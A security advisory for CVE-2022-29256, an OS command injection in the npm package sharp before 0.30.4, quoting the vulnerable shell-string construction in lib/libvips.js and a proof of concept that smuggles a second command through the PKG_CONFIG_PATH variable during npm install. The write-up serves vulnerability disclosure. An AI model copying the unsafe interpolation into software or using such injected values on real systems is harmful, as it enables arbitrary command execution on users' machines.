CVE-2022-29256: OS Command Injection in sharp



sharp prior to version 0.30.4 is vulnerable to OS command injection. The PKG_CONFIG_PATH environment variable is used to check the version of the pre-built dependency; its value is concatenated into a shell command string without any validation and passed straight to the spawnSync method during the package's post-installation step.

Vulnerable snippet

// lib/libvips.js (sharp < 0.30.4)
const globalLibvipsVersion = function () {
  if (process.platform !== 'win32') {
    // The PKG_CONFIG_PATH value is interpolated into a shell command string
    // without validation, so shell metacharacters in it are executed.
    const globalLibvipsVersion = spawnSync(`PKG_CONFIG_PATH="${pkgConfigPath()}" pkg-config --modversion vips-cpp`, spawnSyncOptions).stdout;
    /* istanbul ignore next */
    return (globalLibvipsVersion || '').trim();
// SNIPPED



Proof of Concept

The vulnerable function is invoked during the package's post-installation step, so setting the variable before installing is enough to trigger it.

$ export PKG_CONFIG_PATH='"; touch pwned #'
$ ls -l
total 0
$ npm install sharp --silent
sharp: Using cached /home/dw1/.npm/_libvips/
sharp: Integrity check passed for linux-x64
+ [email protected]
added 67 packages from 204 contributors and audited 67 packages in 5.919s

8 packages are looking for funding
  run `npm fund` for details

found 0 vulnerabilities

$ find . -name "pwned"


This issue leads to arbitrary command execution on the machine installing the package.